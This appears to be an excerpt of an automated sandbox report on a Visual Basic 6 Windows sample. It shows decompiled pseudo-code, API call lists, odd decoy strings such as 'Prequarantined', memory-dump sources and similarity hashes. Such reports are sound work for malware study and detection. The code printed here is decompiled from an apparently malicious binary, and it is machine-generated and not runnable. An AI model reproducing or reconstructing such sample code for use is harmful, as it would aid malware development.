0x0041587b
0x0041587e
0x00415883
0x00415883
0x0041588f
0x00415892
0x00415899
0x0041589c
0x004158a3
0x004158a8
0x004158a9
0x004158ae
0x004158b4
0x004158bc
0x004158bc
0x004158c8
0x004158e2
0x004158ca
0x004158ca
0x004158cf
0x004158d4
0x004158d9
0x004158d9
0x004158fd
0x00415901
0x00415906
0x00415909
0x00415910
0x0041591a
0x00415924
0x00415925
0x00415926
0x00415927
0x00415930
0x00415936
0x00415938
0x0041593f
0x0041595b
0x00415941
0x00415941
0x00415946
0x0041594b
0x0041594e
0x00415951
0x00415956
0x00415956
0x00415962
0x0041596e
0x00415988
0x00415970
0x00415970
0x00415975
0x0041597a
0x0041597f
0x0041597f
0x004159a3
0x004159a7
0x004159ac
0x004159bb
0x004159c1
0x004159c3
0x004159ca
0x004159e6
0x004159cc
0x004159cc
0x004159d1
0x004159d6
0x004159d9
0x004159dc
0x004159e1
0x004159e1
0x004159ea
0x004159ee
0x004159f5
0x004159fa
0x004159fb
0x00000000

APIs

__vbaChkstk.MSVBVM60(?,004015E6), ref: 004156F8
__vbaNew2.MSVBVM60(0040F3CC,p"w,?,?,?,?,004015E6), ref: 0041571D
__vbaObjSet.MSVBVM60(?,00000000), ref: 0041574A
__vbaChkstk.MSVBVM60(?,00000000), ref: 00415763
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040EA8C,000001EC), ref: 0041579F
__vbaFreeObj.MSVBVM60(00000000,?,0040EA8C,000001EC), ref: 004157B0
#572.MSVBVM60(00000002), ref: 004157C7
__vbaStrMove.MSVBVM60(00000002), ref: 004157D1
__vbaStrCmp.MSVBVM60(0040EDF4,00000000,00000002), ref: 004157DC
__vbaFreeStr.MSVBVM60(0040EDF4,00000000,00000002), ref: 004157F0
__vbaFreeVar.MSVBVM60(0040EDF4,00000000,00000002), ref: 004157F8
__vbaNew2.MSVBVM60(0040F3CC,p"w,0040EDF4,00000000,00000002), ref: 0041581C
__vbaObjSet.MSVBVM60(?,00000000), ref: 00415849
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040EA9C,000000A0), ref: 0041587E
#600.MSVBVM60(00000008,00000002), ref: 004158A9
__vbaFreeObj.MSVBVM60(00000008,00000002), ref: 004158B4
__vbaFreeVar.MSVBVM60(00000008,00000002), ref: 004158BC
__vbaNew2.MSVBVM60(0040F3CC,p"w,0040EDF4,00000000,00000002), ref: 004158D4
__vbaObjSet.MSVBVM60(?,00000000), ref: 00415901
__vbaChkstk.MSVBVM60(?,00000000), ref: 0041591A
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040E9AC,000001B0), ref: 00415951
__vbaFreeObj.MSVBVM60(00000000,?,0040E9AC,000001B0), ref: 00415962
__vbaNew2.MSVBVM60(0040F3CC,p"w), ref: 0041597A
__vbaObjSet.MSVBVM60(?,00000000), ref: 004159A7
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040EAE4,000000A0), ref: 004159DC
__vbaFreeObj.MSVBVM60(00000000,?,0040EAE4,000000A0), ref: 004159F5

Strings

Subhexagonal, xrefs: 00415771
p"w, xrefs: 0041570A, 00415713, 00415722, 0041572B, 00415809, 00415812, 00415821, 0041582A, 004158C1, 004158CA, 004158D9, 004158E2, 00415967, 00415970, 0041597F, 00415988
K, xrefs: 004157B5

Memory Dump Source

Source File: 00000000.00000002.798451471.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.798447801.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.798475805.000000000041B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.798480170.000000000041C000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$CheckHresultNew2$Chkstk$#572#600Move
String ID: K$Subhexagonal$p"w
API String ID: 967441687-1032755559
Opcode ID: bdae86b20eddac3730404e3cbc15c39dfa57a5e3997b93739aba8d5a7705053b
Instruction ID: 0df93220d308c0b129c8f74c4da82637f22232ceba64ba840d2e4c308cfa76ec
Opcode Fuzzy Hash: bdae86b20eddac3730404e3cbc15c39dfa57a5e3997b93739aba8d5a7705053b
Instruction Fuzzy Hash: 9AA1E171E00608DFCB14EFA1C845BDEBBB5FF08704F20842AE412BB2A1DBB95945DB59

Uniqueness

Uniqueness Score: -1.00%

Function 00416927, Relevance: 51.0, APIs: 24, Strings: 5, Instructions: 218
COMMON

Download Yara Rule

C-Code - Quality: 47%

			E00416927(void* __ebx, void* __ecx, void* __edi, void* __esi, char* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v24;
				short _v28;
				intOrPtr _v32;
				void* _v36;
				char _v40;
				char _v56;
				char _v72;
				char* _v96;
				intOrPtr _v104;
				intOrPtr _v112;
				char _v120;
				char* _v128;
				intOrPtr _v136;
				intOrPtr _v160;
				intOrPtr _v168;
				void* _v188;
				void* _v192;
				signed int _v196;
				intOrPtr* _v200;
				signed int _v204;
				intOrPtr* _v212;
				signed int _v216;
				signed int _v220;
				intOrPtr* _v224;
				signed int _v228;
				signed int _v232;
				short _t104;
				signed int _t108;
				signed int _t118;
				signed int _t123;
				short _t124;
				signed int _t130;
				signed int _t134;
				intOrPtr _t162;

				_push(0x4015e6);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t162;
				L004015E0();
				_v12 = _t162;
				_v8 = 0x401470;
				_v96 = L"12/12/12";
				_v104 = 8;
				L004017AE();
				_push( &_v56);
				_push( &_v72);
				L004016E8();
				_v112 = 0xc;
				_v120 = 0x8002;
				_push( &_v72);
				_t104 =  &_v120;
				_push(_t104);
				L00401796();
				_v192 = _t104;
				_push( &_v72);
				_push( &_v56);
				_push(2);
				L004017BA();
				if(_v192 != 0) {
					_v96 = _a4;
					_v104 = 9;
					_v128 = L"Tekstbehandlingskodens";
					_v136 = 8;
					_v160 = 0x2a19d7;
					_v168 = 3;
					_push(0x10);
					L004015E0();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_push(0x10);
					L004015E0();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_push(0x10);
					L004015E0();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_push(3);
					_push(L"hIxpJ6vmvc828yytQyubtH93CixB19Z244");
					_push(_v32);
					L00401784();
				}
				_v96 = L"Prequarantined";
				_v104 = 8;
				L004017AE();
				_t108 =  &_v56;
				_push(_t108);
				L0040176C();
				L00401814();
				_push(_t108);
				_push(L"String");
				L00401772();
				asm("sbb eax, eax");
				_v192 =  ~( ~( ~_t108));
				L0040182C();
				L00401838();
				if(_v192 != 0) {
					if( *0x41b2d4 != 0) {
						_v212 = 0x41b2d4;
					} else {
						_push(0x41b2d4);
						_push(0x40ed14);
						L0040185C();
						_v212 = 0x41b2d4;
					}
					_v192 =  *_v212;
					_t130 =  *((intOrPtr*)( *_v192 + 0x1c))(_v192,  &_v40);
					asm("fclex");
					_v196 = _t130;
					if(_v196 >= 0) {
						_v216 = _v216 & 0x00000000;
					} else {
						_push(0x1c);
						_push(0x40ed04);
						_push(_v192);
						_push(_v196);
						L00401856();
						_v216 = _t130;
					}
					_v200 = _v40;
					_t134 =  *((intOrPtr*)( *_v200 + 0x50))(_v200);
					asm("fclex");
					_v204 = _t134;
					if(_v204 >= 0) {
						_v220 = _v220 & 0x00000000;
					} else {
						_push(0x50);
						_push(0x40edc0);
						_push(_v200);
						_push(_v204);
						L00401856();
						_v220 = _t134;
					}
					L00401850();
				}
				if( *0x41b2d4 != 0) {
					_v224 = 0x41b2d4;
				} else {
					_push(0x41b2d4);
					_push(0x40ed14);
					L0040185C();
					_v224 = 0x41b2d4;
				}
				_v192 =  *_v224;
				_t118 =  *((intOrPtr*)( *_v192 + 0x14))(_v192,  &_v40);
				asm("fclex");
				_v196 = _t118;
				if(_v196 >= 0) {
					_v228 = _v228 & 0x00000000;
				} else {
					_push(0x14);
					_push(0x40ed04);
					_push(_v192);
					_push(_v196);
					L00401856();
					_v228 = _t118;
				}
				_v200 = _v40;
				_t123 =  *((intOrPtr*)( *_v200 + 0x70))(_v200,  &_v188);
				asm("fclex");
				_v204 = _t123;
				if(_v204 >= 0) {
					_v232 = _v232 & 0x00000000;
				} else {
					_push(0x70);
					_push(0x40ed24);
					_push(_v200);
					_push(_v204);
					L00401856();
					_v232 = _t123;
				}
				_t124 = _v188;
				_v28 = _t124;
				L00401850();
				_v24 =  *0x401468;
				asm("wait");
				_push(0x416cb6);
				L00401850();
				return _t124;
			}

0x0041692c
0x00416937
0x00416938
0x00416944
0x0041694c
0x0041694f
0x00416956
0x0041695d
0x0041696a
0x00416972
0x00416976
0x00416977
0x0041697c
0x00416983
0x0041698d
0x0041698e
0x00416991
0x00416992
0x00416997
0x004169a1
0x004169a5
0x004169a6
0x004169a8
0x004169b9
0x004169be
0x004169c1
0x004169c8
0x004169cf
0x004169d9
0x004169e3
0x004169ed
0x004169f0
0x004169fa
0x004169fb
0x004169fc
0x004169fd
0x004169fe
0x00416a01
0x00416a0e
0x00416a0f
0x00416a10
0x00416a11
0x00416a12
0x00416a15
0x00416a22
0x00416a23
0x00416a24
0x00416a25
0x00416a26
0x00416a28
0x00416a2d
0x00416a30
0x00416a35
0x00416a38
0x00416a3f
0x00416a4c
0x00416a51
0x00416a54
0x00416a55
0x00416a5f
0x00416a64
0x00416a65
0x00416a6a
0x00416a71
0x00416a77
0x00416a81
0x00416a89
0x00416a97
0x00416aa4
0x00416ac1
0x00416aa6
0x00416aa6
0x00416aab
0x00416ab0
0x00416ab5
0x00416ab5
0x00416ad3
0x00416aeb
0x00416aee
0x00416af0
0x00416afd
0x00416b1f
0x00416aff
0x00416aff
0x00416b01
0x00416b06
0x00416b0c
0x00416b12
0x00416b17
0x00416b17
0x00416b29
0x00416b3d
0x00416b40
0x00416b42
0x00416b4f
0x00416b71
0x00416b51
0x00416b51
0x00416b53
0x00416b58
0x00416b5e
0x00416b64
0x00416b69
0x00416b69
0x00416b7b
0x00416b7b
0x00416b87
0x00416ba4
0x00416b89
0x00416b89
0x00416b8e
0x00416b93
0x00416b98
0x00416b98
0x00416bb6
0x00416bce
0x00416bd1
0x00416bd3
0x00416be0
0x00416c02
0x00416be2
0x00416be2
0x00416be4
0x00416be9
0x00416bef
0x00416bf5
0x00416bfa
0x00416bfa
0x00416c0c
0x00416c27
0x00416c2a
0x00416c2c
0x00416c39
0x00416c5b
0x00416c3b
0x00416c3b
0x00416c3d
0x00416c42
0x00416c48
0x00416c4e
0x00416c53
0x00416c53
0x00416c62
0x00416c69
0x00416c70
0x00416c7b
0x00416c7e
0x00416c7f
0x00416cb0
0x00416cb5

APIs

__vbaChkstk.MSVBVM60(?,004015E6), ref: 00416944
__vbaVarDup.MSVBVM60 ref: 0041696A
#545.MSVBVM60(?,?), ref: 00416977
__vbaVarTstNe.MSVBVM60(00008002,?,?,?,?,?), ref: 00416992
__vbaFreeVarList.MSVBVM60(00000002,?,?,00008002,?,?,?,?,?), ref: 004169A8
__vbaChkstk.MSVBVM60 ref: 004169F0
__vbaChkstk.MSVBVM60 ref: 00416A01
__vbaChkstk.MSVBVM60 ref: 00416A15
__vbaLateMemCall.MSVBVM60(?,hIxpJ6vmvc828yytQyubtH93CixB19Z244,00000003), ref: 00416A30
__vbaVarDup.MSVBVM60 ref: 00416A4C
#591.MSVBVM60(?), ref: 00416A55
__vbaStrMove.MSVBVM60(?), ref: 00416A5F
__vbaStrCmp.MSVBVM60(String,00000000,?), ref: 00416A6A
__vbaFreeStr.MSVBVM60(String,00000000,?), ref: 00416A81
__vbaFreeVar.MSVBVM60(String,00000000,?), ref: 00416A89
__vbaNew2.MSVBVM60(0040ED14,0041B2D4,String,00000000,?), ref: 00416AB0
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040ED04,0000001C), ref: 00416B12
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040EDC0,00000050), ref: 00416B64
__vbaFreeObj.MSVBVM60(00000000,?,0040EDC0,00000050), ref: 00416B7B
__vbaNew2.MSVBVM60(0040ED14,0041B2D4,String,00000000,?), ref: 00416B93
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040ED04,00000014), ref: 00416BF5
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040ED24,00000070), ref: 00416C4E
__vbaFreeObj.MSVBVM60(00000000,?,0040ED24,00000070), ref: 00416C70
__vbaFreeObj.MSVBVM60(00416CB6), ref: 00416CB0

Strings

Tekstbehandlingskodens, xrefs: 004169C8
Prequarantined, xrefs: 00416A38
String, xrefs: 00416A65
12/12/12, xrefs: 00416956
hIxpJ6vmvc828yytQyubtH93CixB19Z244, xrefs: 00416A28

Memory Dump Source

Source File: 00000000.00000002.798451471.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.798447801.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.798475805.000000000041B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.798480170.000000000041C000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$CheckChkstkHresult$New2$#545#591CallLateListMove
String ID: 12/12/12$Prequarantined$String$Tekstbehandlingskodens$hIxpJ6vmvc828yytQyubtH93CixB19Z244
API String ID: 603072471-101196536
Opcode ID: 29caeae440a5bcb4ad0c788ea008788eaa8269be9f6bfca096bfeee7b1b12944
Instruction ID: 6c15cabb98e25a1977944a2b2ed64f644c5bceb0219cb6f9559b498fd786439f
Opcode Fuzzy Hash: 29caeae440a5bcb4ad0c788ea008788eaa8269be9f6bfca096bfeee7b1b12944
Instruction Fuzzy Hash: 4391F471901228DBDB20EF91CD45BDDB7B5FF04304F1085AAE109BB2A0DB795A88CF69

Uniqueness

Uniqueness Score: -1.00%

Function 00418415, Relevance: 49.3, APIs: 26, Strings: 2, Instructions: 313
COMMON

Download Yara Rule

C-Code - Quality: 50%

			E00418415(void* __ebx, void* __ecx, void* __edi, void* __esi, char __fp0) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* _v24;
				short _v28;
				void* _v32;
				signed int _v36;
				char _v40;
				char _v44;
				char _v60;
				char _v68;
				char _v76;
				intOrPtr _v84;
				char _v92;
				intOrPtr _v100;
				char _v108;
				intOrPtr _v116;
				char _v124;
				intOrPtr _v132;
				char _v140;
				intOrPtr _v148;
				char _v156;
				char* _v164;
				intOrPtr _v172;
				char* _v180;
				intOrPtr _v188;
				char* _v196;
				char _v204;
				short _v272;
				char _v276;
				intOrPtr* _v280;
				signed int _v284;
				void* _v288;
				signed int _v292;
				short _v296;
				intOrPtr _v304;
				intOrPtr* _v308;
				signed int _v312;
				intOrPtr* _v316;
				short _v320;
				char _v324;
				signed int _v328;
				intOrPtr* _v332;
				signed int _v336;
				signed int _v340;
				intOrPtr* _v344;
				signed int _v348;
				signed int _v352;
				char* _t161;
				signed int _t165;
				char* _t169;
				signed int _t176;
				signed int _t184;
				signed int _t189;
				signed int _t199;
				signed int _t204;
				signed int _t205;
				intOrPtr _t227;
				intOrPtr _t248;
				char _t263;

				_t263 = __fp0;
				_push(0x4015e6);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t248;
				L004015E0();
				_v12 = _t248;
				_v8 = 0x401510;
				if( *0x41b010 != 0) {
					_v308 = 0x41b010;
				} else {
					_push("p"w");
					_push(0x40f3cc);
					L0040185C();
					_v308 = 0x41b010;
				}
				_t161 =  &_v40;
				L00401862();
				_v280 = _t161;
				_t165 =  *((intOrPtr*)( *_v280 + 0x168))(_v280,  &_v272, _t161,  *((intOrPtr*)( *((intOrPtr*)( *_v308)) + 0x30c))( *_v308));
				asm("fclex");
				_v284 = _t165;
				if(_v284 >= 0) {
					_v312 = _v312 & 0x00000000;
				} else {
					_push(0x168);
					_push(0x40ead4);
					_push(_v280);
					_push(_v284);
					L00401856();
					_v312 = _t165;
				}
				if( *0x41b010 != 0) {
					_v316 = 0x41b010;
				} else {
					_push("p"w");
					_push(0x40f3cc);
					L0040185C();
					_v316 = 0x41b010;
				}
				_t227 =  *((intOrPtr*)( *_v316));
				_t169 =  &_v44;
				L00401862();
				_v288 = _t169;
				_v196 = 0x80020004;
				_v204 = 0xa;
				_v180 = 0x80020004;
				_v188 = 0xa;
				_v164 = 0x80020004;
				_v172 = 0xa;
				L004015E0();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				L004015E0();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				L004015E0();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v320 = _v272;
				asm("fild dword [ebp-0x13c]");
				_v324 = _t263;
				_v68 = _v324;
				_t176 =  *((intOrPtr*)( *_v288 + 0x178))(_v288, _t227, 0x10, 0x10, 0x10, _t169,  *((intOrPtr*)(_t227 + 0x338))( *_v316));
				asm("fclex");
				_v292 = _t176;
				if(_v292 >= 0) {
					_v328 = _v328 & 0x00000000;
				} else {
					_push(0x178);
					_push(0x40eae4);
					_push(_v288);
					_push(_v292);
					L00401856();
					_v328 = _t176;
				}
				_push( &_v44);
				_push( &_v40);
				_push(2);
				L00401826();
				if( *0x41b2d4 != 0) {
					_v332 = 0x41b2d4;
				} else {
					_push(0x41b2d4);
					_push(0x40ed14);
					L0040185C();
					_v332 = 0x41b2d4;
				}
				_v280 =  *_v332;
				_t184 =  *((intOrPtr*)( *_v280 + 0x14))(_v280,  &_v40);
				asm("fclex");
				_v284 = _t184;
				if(_v284 >= 0) {
					_v336 = _v336 & 0x00000000;
				} else {
					_push(0x14);
					_push(0x40ed04);
					_push(_v280);
					_push(_v284);
					L00401856();
					_v336 = _t184;
				}
				_v288 = _v40;
				_t189 =  *((intOrPtr*)( *_v288 + 0x100))(_v288,  &_v276);
				asm("fclex");
				_v292 = _t189;
				if(_v292 >= 0) {
					_v340 = _v340 & 0x00000000;
				} else {
					_push(0x100);
					_push(0x40ed24);
					_push(_v288);
					_push(_v292);
					L00401856();
					_v340 = _t189;
				}
				_v296 =  ~(0 | _v276 != 0x00400000);
				L00401850();
				if(_v296 != 0) {
					_v148 = 0x80020004;
					_v156 = 0xa;
					_v132 = 0x80020004;
					_v140 = 0xa;
					_v116 = 0x80020004;
					_v124 = 0xa;
					_v100 = 0x80020004;
					_v108 = 0xa;
					_v84 = 0x80020004;
					_v92 = 0xa;
					_v68 = 0x80020004;
					_v76 = 0xa;
					_v164 = L"Smadderkasserne6";
					_v172 = 8;
					L004017AE();
					_push( &_v156);
					_push( &_v140);
					_push( &_v124);
					_push( &_v108);
					_push( &_v92);
					_push( &_v76);
					_push( &_v60);
					L004016A6();
					L00401814();
					_push( &_v156);
					_push( &_v140);
					_push( &_v124);
					_push( &_v108);
					_push( &_v92);
					_push( &_v76);
					_push( &_v60);
					_push(7);
					L004017BA();
				}
				if( *0x41b2d4 != 0) {
					_v344 = 0x41b2d4;
				} else {
					_push(0x41b2d4);
					_push(0x40ed14);
					L0040185C();
					_v344 = 0x41b2d4;
				}
				_v280 =  *_v344;
				_t199 =  *((intOrPtr*)( *_v280 + 0x14))(_v280,  &_v40);
				asm("fclex");
				_v284 = _t199;
				if(_v284 >= 0) {
					_v348 = _v348 & 0x00000000;
				} else {
					_push(0x14);
					_push(0x40ed04);
					_push(_v280);
					_push(_v284);
					L00401856();
					_v348 = _t199;
				}
				_v288 = _v40;
				_t204 =  *((intOrPtr*)( *_v288 + 0xd8))(_v288,  &_v36);
				asm("fclex");
				_v292 = _t204;
				if(_v292 >= 0) {
					_v352 = _v352 & 0x00000000;
				} else {
					_push(0xd8);
					_push(0x40ed24);
					_push(_v288);
					_push(_v292);
					L00401856();
					_v352 = _t204;
				}
				_t205 = _v36;
				_v304 = _t205;
				_v36 = _v36 & 0x00000000;
				L00401814();
				L00401850();
				_v28 = 0x4edc;
				asm("wait");
				_push(0x4189a5);
				L0040182C();
				L0040182C();
				return _t205;
			}

0x00418415
0x0041841a
0x00418425
0x00418426
0x00418432
0x0041843a
0x0041843d
0x0041844b
0x00418468
0x0041844d
0x0041844d
0x00418452
0x00418457
0x0041845c
0x0041845c
0x0041848c
0x00418490
0x00418495
0x004184b0
0x004184b6
0x004184b8
0x004184c5
0x004184ea
0x004184c7
0x004184c7
0x004184cc
0x004184d1
0x004184d7
0x004184dd
0x004184e2
0x004184e2
0x004184f8
0x00418515
0x004184fa
0x004184fa
0x004184ff
0x00418504
0x00418509
0x00418509
0x0041852f
0x00418539
0x0041853d
0x00418542
0x00418548
0x00418552
0x0041855c
0x00418566
0x00418570
0x0041857a
0x00418587
0x00418594
0x00418595
0x00418596
0x00418597
0x0041859b
0x004185a8
0x004185a9
0x004185aa
0x004185ab
0x004185af
0x004185bc
0x004185bd
0x004185be
0x004185bf
0x004185c7
0x004185cd
0x004185d3
0x004185e0
0x004185f1
0x004185f7
0x004185f9
0x00418606
0x0041862b
0x00418608
0x00418608
0x0041860d
0x00418612
0x00418618
0x0041861e
0x00418623
0x00418623
0x00418635
0x00418639
0x0041863a
0x0041863c
0x0041864b
0x00418668
0x0041864d
0x0041864d
0x00418652
0x00418657
0x0041865c
0x0041865c
0x0041867a
0x00418692
0x00418695
0x00418697
0x004186a4
0x004186c6
0x004186a6
0x004186a6
0x004186a8
0x004186ad
0x004186b3
0x004186b9
0x004186be
0x004186be
0x004186d0
0x004186eb
0x004186f1
0x004186f3
0x00418700
0x00418725
0x00418702
0x00418702
0x00418707
0x0041870c
0x00418712
0x00418718
0x0041871d
0x0041871d
0x0041873d
0x00418747
0x00418755
0x0041875b
0x00418765
0x0041876f
0x00418776
0x00418780
0x00418787
0x0041878e
0x00418795
0x0041879c
0x004187a3
0x004187aa
0x004187b1
0x004187b8
0x004187c2
0x004187d5
0x004187e0
0x004187e7
0x004187eb
0x004187ef
0x004187f3
0x004187f7
0x004187fb
0x004187fc
0x00418806
0x00418811
0x00418818
0x0041881c
0x00418820
0x00418824
0x00418828
0x0041882c
0x0041882d
0x0041882f
0x00418834
0x0041883e
0x0041885b
0x00418840
0x00418840
0x00418845
0x0041884a
0x0041884f
0x0041884f
0x0041886d
0x00418885
0x00418888
0x0041888a
0x00418897
0x004188b9
0x00418899
0x00418899
0x0041889b
0x004188a0
0x004188a6
0x004188ac
0x004188b1
0x004188b1
0x004188c3
0x004188db
0x004188e1
0x004188e3
0x004188f0
0x00418915
0x004188f2
0x004188f2
0x004188f7
0x004188fc
0x00418902
0x00418908
0x0041890d
0x0041890d
0x0041891c
0x0041891f
0x00418925
0x00418932
0x0041893a
0x0041893f
0x00418945
0x00418946
0x00418997
0x0041899f
0x004189a4

APIs

__vbaChkstk.MSVBVM60(?,004015E6), ref: 00418432
__vbaNew2.MSVBVM60(0040F3CC,p"w,?,?,?,?,004015E6), ref: 00418457
__vbaObjSet.MSVBVM60(?,00000000), ref: 00418490
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040EAD4,00000168), ref: 004184DD
__vbaNew2.MSVBVM60(0040F3CC,p"w), ref: 00418504
__vbaObjSet.MSVBVM60(?,00000000), ref: 0041853D
__vbaChkstk.MSVBVM60(?,00000000), ref: 00418587
__vbaChkstk.MSVBVM60(?,00000000), ref: 0041859B
__vbaChkstk.MSVBVM60(?,00000000), ref: 004185AF
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040EAE4,00000178,?,?,00000000), ref: 0041861E
__vbaFreeObjList.MSVBVM60(00000002,?,?,?,?,00000000), ref: 0041863C
__vbaNew2.MSVBVM60(0040ED14,0041B2D4), ref: 00418657
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040ED04,00000014), ref: 004186B9
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040ED24,00000100), ref: 00418718
__vbaFreeObj.MSVBVM60(00000000,?,0040ED24,00000100), ref: 00418747
__vbaVarDup.MSVBVM60(00000000,?,0040ED24,00000100), ref: 004187D5
#596.MSVBVM60(?,0000000A,0000000A,0000000A,0000000A,0000000A,0000000A), ref: 004187FC
__vbaStrMove.MSVBVM60(?,0000000A,0000000A,0000000A,0000000A,0000000A,0000000A), ref: 00418806
__vbaFreeVarList.MSVBVM60(00000007,?,0000000A,0000000A,0000000A,0000000A,0000000A,0000000A,?,0000000A,0000000A,0000000A,0000000A,0000000A,0000000A), ref: 0041882F
__vbaNew2.MSVBVM60(0040ED14,0041B2D4), ref: 0041884A
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040ED04,00000014), ref: 004188AC
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040ED24,000000D8), ref: 00418908
__vbaStrMove.MSVBVM60 ref: 00418932
__vbaFreeObj.MSVBVM60 ref: 0041893A
__vbaFreeStr.MSVBVM60(004189A5), ref: 00418997
__vbaFreeStr.MSVBVM60(004189A5), ref: 0041899F

Strings

p"w, xrefs: 00418444, 0041844D, 0041845C, 00418468, 004184F1, 004184FA, 00418509, 00418515
Smadderkasserne6, xrefs: 004187B8

Memory Dump Source

Source File: 00000000.00000002.798451471.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.798447801.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.798475805.000000000041B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.798480170.000000000041C000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$CheckFreeHresult$ChkstkNew2$ListMove$#596
String ID: Smadderkasserne6$p"w
API String ID: 471018913-3507003267
Opcode ID: 0175fa25f95685682f41fd1058524acb775129925ffafb89505576e811064004
Instruction ID: a09956801efc197b138e4fee0117ae4721c762384208ee1272b84af51662bcd3
Opcode Fuzzy Hash: 0175fa25f95685682f41fd1058524acb775129925ffafb89505576e811064004
Instruction Fuzzy Hash: ECE1C4B19002289FDB25EF50CC85BDDB7B5FB09304F1041EAE109BA2A1DB795AC5CF99

Uniqueness

Uniqueness Score: -1.00%

Function 00416CD1, Relevance: 49.3, APIs: 27, Strings: 1, Instructions: 258
COMMON

Download Yara Rule

C-Code - Quality: 49%

			E00416CD1(void* __ebx, void* __edi, void* __esi, void* __eflags, char __fp0, intOrPtr* _a4, void* _a24) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v28;
				char _v32;
				signed int _v36;
				char _v40;
				intOrPtr _v48;
				char _v56;
				char _v64;
				char _v72;
				char _v80;
				char _v88;
				intOrPtr _v96;
				char _v104;
				char _v156;
				void* _v160;
				signed int _v164;
				signed int _v176;
				signed int _v180;
				intOrPtr* _v184;
				signed int _v188;
				intOrPtr* _v192;
				signed int _v196;
				intOrPtr* _v200;
				signed int _v204;
				char* _t125;
				intOrPtr* _t129;
				char* _t133;
				signed int _t136;
				char* _t137;
				char* _t140;
				signed int _t143;
				char* _t147;
				signed int _t151;
				char* _t163;
				void* _t177;
				void* _t179;
				intOrPtr _t180;
				void* _t181;

				_t180 = _t179 - 0xc;
				 *[fs:0x0] = _t180;
				L004015E0();
				_v16 = _t180;
				_v12 = 0x401488;
				_v8 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx,  *[fs:0x0], 0x4015e6, _t177);
				_t163 =  &_v28;
				L00401820();
				_v64 = 0x80020004;
				_v72 = 0xa;
				_v48 = 0x80020004;
				_v56 = 0xa;
				_push( &_v72);
				_push( &_v56);
				asm("fld1");
				_push(_t163);
				_push(_t163);
				_v56 = __fp0;
				asm("fld1");
				_push(_t163);
				_push(_t163);
				_v64 = __fp0;
				asm("fld1");
				_push(_t163);
				_push(_t163);
				_v72 = __fp0;
				asm("fld1");
				_push(_t163);
				_push(_t163);
				_v80 = __fp0;
				L004016E2();
				L004017C6();
				asm("fcomp qword [0x401480]");
				asm("fnstsw ax");
				asm("sahf");
				if(__eflags == 0) {
					_t16 =  &_v180;
					 *_t16 = _v180 & 0x00000000;
					__eflags =  *_t16;
				} else {
					_v180 = 1;
				}
				_v160 =  ~_v180;
				_push( &_v72);
				_push( &_v56);
				_push(2);
				L004017BA();
				_t181 = _t180 + 0xc;
				if(_v160 != 0) {
					_v96 = 0x80020004;
					_v104 = 0xa;
					_v80 = 0x80020004;
					_v88 = 0xa;
					_v64 = 0x80020004;
					_v72 = 0xa;
					if( *0x41b010 != 0) {
						_v184 = 0x41b010;
					} else {
						_push("p"w");
						_push(0x40f3cc);
						L0040185C();
						_v184 = 0x41b010;
					}
					_t147 =  &_v40;
					L00401862();
					_v160 = _t147;
					_t151 =  *((intOrPtr*)( *_v160 + 0xd0))(_v160,  &_v36, _t147,  *((intOrPtr*)( *((intOrPtr*)( *_v184)) + 0x354))( *_v184));
					asm("fclex");
					_v164 = _t151;
					if(_v164 >= 0) {
						_t45 =  &_v188;
						 *_t45 = _v188 & 0x00000000;
						__eflags =  *_t45;
					} else {
						_push(0xd0);
						_push(0x40ec18);
						_push(_v160);
						_push(_v164);
						L00401856();
						_v188 = _t151;
					}
					_v176 = _v36;
					_v36 = _v36 & 0x00000000;
					_v48 = _v176;
					_v56 = 8;
					_push( &_v104);
					_push( &_v88);
					_push( &_v72);
					_push(0);
					_push( &_v56);
					L004016DC();
					L00401850();
					_push( &_v104);
					_push( &_v88);
					_push( &_v72);
					_push( &_v56);
					_push(4);
					L004017BA();
					_t181 = _t181 + 0x14;
				}
				_v48 = 0x80020004;
				_v56 = 0xa;
				_push(0);
				_push(0xffffffff);
				_push( &_v56);
				_push(0x40f048);
				_push( &_v72);
				L004016D6();
				_t125 =  &_v72;
				_push(_t125);
				_push(0x2008);
				L00401844();
				_v156 = _t125;
				_push( &_v156);
				_push( &_v32);
				L0040184A();
				_push( &_v72);
				_t129 =  &_v56;
				_push(_t129);
				_push(2);
				L004017BA();
				_push(0);
				_push(_v32);
				L004016D0();
				_push( *_t129);
				_push(0x40ecc0);
				L00401772();
				if(_t129 != 0) {
